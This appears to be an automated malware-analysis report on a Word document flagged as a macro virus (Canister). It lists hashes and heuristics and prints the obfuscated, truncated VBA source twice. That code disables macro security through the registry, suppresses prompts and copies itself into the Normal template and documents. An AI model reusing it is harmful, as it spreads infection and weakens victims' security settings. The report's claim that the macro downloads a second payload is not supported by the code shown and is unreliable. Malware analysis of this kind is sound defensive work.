Office (OLE) malware analysis — malicious · d63851cd1e4e8d1d

MALICIOUS

Office (OLE)

30.5 KB Created: 2005-06-28 11:38:00 Authoring application: Microsoft Word 9.0 First seen: 2012-10-03

MD5: 045f8c20f9f0d6c6c1c9a26072680c64 SHA-1: f57d67e881e118fcb09d2d954d6a7aef0f357821 SHA-256: d63851cd1e4e8d1d524f6ea8da148ba2ff92b46d51d7fdfd02d95839d828adf0

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing VBA macros, as indicated by the OLE_VBA_MACROS heuristic and the presence of the macros.bas script. The script uses `CallByName` extensively and constructs registry paths and strings dynamically, suggesting it's designed to download and execute a secondary payload. The ClamAV detection of 'Doc.Trojan.Canister-1' and the embedded string 'canister.doc' further support a malicious intent, likely delivered via spearphishing.

Heuristics 3

ClamAV: Doc.Trojan.Canister-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Canister-1
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
CallByName call high OLE_VBA_CALLBYNAME

CallByName call

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4506 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4506 bytes
SHA-256: `cdfedb9b0cd495570901b83546c0dd6cd598078fddab9e9523b79de7fd149f2c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Close() 'WMXP.CaniSter by Kernel32 FQPOTCYBCLM01: Randomize Timer: Dim KBPOIAJSIJCW(20) As String: Dim MLGBQPWVWVX(10) As String: GoSub FQPOTCYBCLM25: GoTo FQPOTCYBCLM20 FQPOTCYBCLM09: VBA.CallByName CLAUYYGHVGDU, MLGBQPWVWVX(5), VbMethod, QCAJUDMVDGGJEV: GoTo FQPOTCYBCLM10 FQPOTCYBCLM06: VBA.CallByName Options.Application, MLGBQPWVWVX(3), VbLet, XJKMRRVTYRGUW: VBA.CallByName Options, MLGBQPWVWVX(6), VbLet, XJKMRRVTYRGUW: GoTo FQPOTCYBCLM07: FQPOTCYBCLM13: KBPOIAJSIJCW(LDYPAMMQBIQB) = "VQWNCIKMOVNKI": KBPOIAJSIJCW(2) = "XJKMRRVTYRGUW": KBPOIAJSIJCW(3) = "LDYPAMMQBIQB": KBPOIAJSIJCW(13) = "MLGBQPWVWVX": GoTo FQPOTCYBCLM14 FQPOTCYBCLM20: MLGBQPWVWVX(1) = StrReverse("senilfotnuoC"): MLGBQPWVWVX(2) = StrReverse("seniL"): GoTo FQPOTCYBCLM21 FQPOTCYBCLM21: MLGBQPWVWVX(3) = StrReverse("gnitadpUneercS"): MLGBQPWVWVX(4) = StrReverse("senileteleD"): GoTo FQPOTCYBCLM22 FQPOTCYBCLM22: MLGBQPWVWVX(5) = StrReverse("gnirtsmorfddA"): MLGBQPWVWVX(6) = StrReverse("tpmorPlamroNevaS"): GoTo FQPOTCYBCLM23 FQPOTCYBCLM07: Set CLAUYYGHVGDU = NormalTemplate.VBProject.VBComponents(LDYPAMMQBIQB).CodeModule: GoTo FQPOTCYBCLM08 FQPOTCYBCLM10: Set BUPFMXCXSNUGW = ActiveDocument.VBProject.VBComponents(LDYPAMMQBIQB).CodeModule: GoTo FQPOTCYBCLM11 FQPOTCYBCLM25: CallByName System, StrReverse("gnirtseliforpetavirP"), VbLet, "", StrReverse("\ytiruceS\Drow\0.01\eceffO\tfosorciM\erawtfos\resu_tnerruc_yekh"), "Level", 1&: GoTo FQPOTCYBCLM26 FQPOTCYBCLM24: MLGBQPWVWVX(9) = StrReverse("strelAyalpsiD"): MLGBQPWVWVX(10) = StrReverse("enilecalpeR"): GoTo FQPOTCYBCLM02 FQPOTCYBCLM16: KBPOIAJSIJCW(10) = "HGSEMIQXFLIQDY": KBPOIAJSIJCW(11) = "UIVFVFDGUKHE": KBPOIAJSIJCW(12) = "KQSSFKXVVMCD": GoTo FQPOTCYBCLM17 FQPOTCYBCLM04: VBA.CallByName Application, MLGBQPWVWVX(7), VbLet, XJKMRRVTYRGUW: VBA.CallByName Application, MLGBQPWVWVX(9), VbLet, wdAlertsNone: GoTo FQPOTCYBCLM05 FQPOTCYBCLM19: For HGSEMIQXFLIQDY = 2 To 25 Step VBA.Int(Rnd * 3) + LDYPAMMQBIQB: UIVFVFDGUKHE = VBA.CallByName(VQWNCIKMOVNKI, MLGBQPWVWVX(2), VbGet, LDYPAMMQBIQB + HGSEMIQXFLIQDY, LDYPAMMQBIQB): KQSSFKXVVMCD = VBA.CallByName(VQWNCIKMOVNKI, MLGBQPWVWVX(2), VbGet, 2 + HGSEMIQXFLIQDY, LDYPAMMQBIQB): VBA.CallByName VQWNCIKMOVNKI, MLGBQPWVWVX(10), VbMethod, HGSEMIQXFLIQDY + LDYPAMMQBIQB, KQSSFKXVVMCD: VBA.CallByName VQWNCIKMOVNKI, MLGBQPWVWVX(10), VbMethod, HGSEMIQXFLIQDY + 2, UIVFVFDGUKHE: Next: End FQPOTCYBCLM11: VBA.CallByName BUPFMXCXSNUGW, MLGBQPWVWVX(4), VbMethod, LDYPAMMQBIQB, VBA.CallByName(BUPFMXCXSNUGW, MLGBQPWVWVX(1), VbGet): GoTo FQPOTCYBCLM12 FQPOTCYBCLM15: KBPOIAJSIJCW(7) = "KBPOIAJSIJCW": KBPOIAJSIJCW(8) = "FQPOTCYBCLM": KBPOIAJSIJCW(9) = "BRYTJTKYYSHVMU": GoTo FQPOTCYBCLM16 FQPOTCYBCLM26: CallByName System, StrReverse("gnirtseliforpetavirP"), VbLet, "", StrReverse("\ytiruceS\Drow\0.01\eceffO\tfosorciM\erawtfos\resu_tnerruc_yekh"), StrReverse("MOBVsseccA"), 1&: Return FQPOTCYBCLM12: VBA.CallByName BUPFMXCXSNUGW, MLGBQPWVWVX(5), VbMethod, QCAJUDMVDGGJEV: GoTo FQPOTCYBCLM19 FQPOTCYBCLM05: VBA.CallByName Application.Options, MLGBQPWVWVX(8), VbLet, XJKMRRVTYRGUW: GoTo FQPOTCYBCLM06 FQPOTCYBCLM18: QCAJUDMVDGGJEV = Replace(QCAJUDMVDGGJEV, KBPOIAJSIJCW(Int(Rnd * 13) + LDYPAMMQBIQB), BRYTJTKYYSHVMU): Return FQPOTCYBCLM02: XJKMRRVTYRGUW = (False * False): LDYPAMMQBIQB = (True / True): Set VQWNCIKMOVNKI = VBE.ActiveVBProject.VBComponents(LDYPAMMQBIQB).CodeModule: GoTo FQPOTCYBCLM03 FQPOTCYBCLM23: MLGBQPWVWVX(7) = StrReverse("raBsutatsyalpsiD"): MLGBQPWVWVX(8) = StrReverse("snoisrevnoCmrifnoC"): GoTo FQPOTCYBCLM24 FQPOTCYBCLM14: KBPOIAJSIJCW(4) = "QCAJUDMVDGGJEV": KBPOIAJSIJCW(5) = "CLAUYYGHVGDU": KBPOIAJSIJCW(6) = "BUPFMXCXSNUGW": GoTo FQPOTCYBCLM15 FQPOTCYBCLM03: QCAJUDMVDGGJEV = VBA.CallByName(VQWNCIKMOVNKI, MLGBQPWVWVX(2), VbGet, LDYPAMMQBIQB, VBA.CallByName(VQWNCIKMOVNKI ... (truncated)

SHA-256: cdfedb9b0cd495570901b83546c0dd6cd598078fddab9e9523b79de7fd149f2c

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close() 'WMXP.CaniSter by Kernel32
FQPOTCYBCLM01: Randomize Timer: Dim KBPOIAJSIJCW(20) As String: Dim MLGBQPWVWVX(10) As String: GoSub FQPOTCYBCLM25: GoTo FQPOTCYBCLM20
FQPOTCYBCLM09: VBA.CallByName CLAUYYGHVGDU, MLGBQPWVWVX(5), VbMethod, QCAJUDMVDGGJEV: GoTo FQPOTCYBCLM10
FQPOTCYBCLM06: VBA.CallByName Options.Application, MLGBQPWVWVX(3), VbLet, XJKMRRVTYRGUW: VBA.CallByName Options, MLGBQPWVWVX(6), VbLet, XJKMRRVTYRGUW: GoTo FQPOTCYBCLM07:
FQPOTCYBCLM13: KBPOIAJSIJCW(LDYPAMMQBIQB) = "VQWNCIKMOVNKI": KBPOIAJSIJCW(2) = "XJKMRRVTYRGUW": KBPOIAJSIJCW(3) = "LDYPAMMQBIQB": KBPOIAJSIJCW(13) = "MLGBQPWVWVX": GoTo FQPOTCYBCLM14
FQPOTCYBCLM20: MLGBQPWVWVX(1) = StrReverse("senilfotnuoC"): MLGBQPWVWVX(2) = StrReverse("seniL"): GoTo FQPOTCYBCLM21
FQPOTCYBCLM21: MLGBQPWVWVX(3) = StrReverse("gnitadpUneercS"): MLGBQPWVWVX(4) = StrReverse("senileteleD"): GoTo FQPOTCYBCLM22
FQPOTCYBCLM22: MLGBQPWVWVX(5) = StrReverse("gnirtsmorfddA"): MLGBQPWVWVX(6) = StrReverse("tpmorPlamroNevaS"): GoTo FQPOTCYBCLM23
FQPOTCYBCLM07: Set CLAUYYGHVGDU = NormalTemplate.VBProject.VBComponents(LDYPAMMQBIQB).CodeModule: GoTo FQPOTCYBCLM08
FQPOTCYBCLM10: Set BUPFMXCXSNUGW = ActiveDocument.VBProject.VBComponents(LDYPAMMQBIQB).CodeModule: GoTo FQPOTCYBCLM11
FQPOTCYBCLM25: CallByName System, StrReverse("gnirtseliforpetavirP"), VbLet, "", StrReverse("\ytiruceS\Drow\0.01\eceffO\tfosorciM\erawtfos\resu_tnerruc_yekh"), "Level", 1&: GoTo FQPOTCYBCLM26
FQPOTCYBCLM24: MLGBQPWVWVX(9) = StrReverse("strelAyalpsiD"): MLGBQPWVWVX(10) = StrReverse("enilecalpeR"): GoTo FQPOTCYBCLM02
FQPOTCYBCLM16: KBPOIAJSIJCW(10) = "HGSEMIQXFLIQDY": KBPOIAJSIJCW(11) = "UIVFVFDGUKHE": KBPOIAJSIJCW(12) = "KQSSFKXVVMCD": GoTo FQPOTCYBCLM17
FQPOTCYBCLM04: VBA.CallByName Application, MLGBQPWVWVX(7), VbLet, XJKMRRVTYRGUW: VBA.CallByName Application, MLGBQPWVWVX(9), VbLet, wdAlertsNone: GoTo FQPOTCYBCLM05
FQPOTCYBCLM19: For HGSEMIQXFLIQDY = 2 To 25 Step VBA.Int(Rnd * 3) + LDYPAMMQBIQB: UIVFVFDGUKHE = VBA.CallByName(VQWNCIKMOVNKI, MLGBQPWVWVX(2), VbGet, LDYPAMMQBIQB + HGSEMIQXFLIQDY, LDYPAMMQBIQB): KQSSFKXVVMCD = VBA.CallByName(VQWNCIKMOVNKI, MLGBQPWVWVX(2), VbGet, 2 + HGSEMIQXFLIQDY, LDYPAMMQBIQB): VBA.CallByName VQWNCIKMOVNKI, MLGBQPWVWVX(10), VbMethod, HGSEMIQXFLIQDY + LDYPAMMQBIQB, KQSSFKXVVMCD: VBA.CallByName VQWNCIKMOVNKI, MLGBQPWVWVX(10), VbMethod, HGSEMIQXFLIQDY + 2, UIVFVFDGUKHE: Next: End
FQPOTCYBCLM11: VBA.CallByName BUPFMXCXSNUGW, MLGBQPWVWVX(4), VbMethod, LDYPAMMQBIQB, VBA.CallByName(BUPFMXCXSNUGW, MLGBQPWVWVX(1), VbGet): GoTo FQPOTCYBCLM12
FQPOTCYBCLM15: KBPOIAJSIJCW(7) = "KBPOIAJSIJCW": KBPOIAJSIJCW(8) = "FQPOTCYBCLM": KBPOIAJSIJCW(9) = "BRYTJTKYYSHVMU": GoTo FQPOTCYBCLM16
FQPOTCYBCLM26: CallByName System, StrReverse("gnirtseliforpetavirP"), VbLet, "", StrReverse("\ytiruceS\Drow\0.01\eceffO\tfosorciM\erawtfos\resu_tnerruc_yekh"), StrReverse("MOBVsseccA"), 1&: Return
FQPOTCYBCLM12: VBA.CallByName BUPFMXCXSNUGW, MLGBQPWVWVX(5), VbMethod, QCAJUDMVDGGJEV: GoTo FQPOTCYBCLM19
FQPOTCYBCLM05: VBA.CallByName Application.Options, MLGBQPWVWVX(8), VbLet, XJKMRRVTYRGUW: GoTo FQPOTCYBCLM06
FQPOTCYBCLM18: QCAJUDMVDGGJEV = Replace(QCAJUDMVDGGJEV, KBPOIAJSIJCW(Int(Rnd * 13) + LDYPAMMQBIQB), BRYTJTKYYSHVMU): Return
FQPOTCYBCLM02: XJKMRRVTYRGUW = (False * False): LDYPAMMQBIQB = (True / True): Set VQWNCIKMOVNKI = VBE.ActiveVBProject.VBComponents(LDYPAMMQBIQB).CodeModule: GoTo FQPOTCYBCLM03
FQPOTCYBCLM23: MLGBQPWVWVX(7) = StrReverse("raBsutatsyalpsiD"): MLGBQPWVWVX(8) = StrReverse("snoisrevnoCmrifnoC"): GoTo FQPOTCYBCLM24
FQPOTCYBCLM14: KBPOIAJSIJCW(4) = "QCAJUDMVDGGJEV": KBPOIAJSIJCW(5) = "CLAUYYGHVGDU": KBPOIAJSIJCW(6) = "BUPFMXCXSNUGW": GoTo FQPOTCYBCLM15
FQPOTCYBCLM03: QCAJUDMVDGGJEV = VBA.CallByName(VQWNCIKMOVNKI, MLGBQPWVWVX(2), VbGet, LDYPAMMQBIQB, VBA.CallByName(VQWNCIKMOVNKI
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.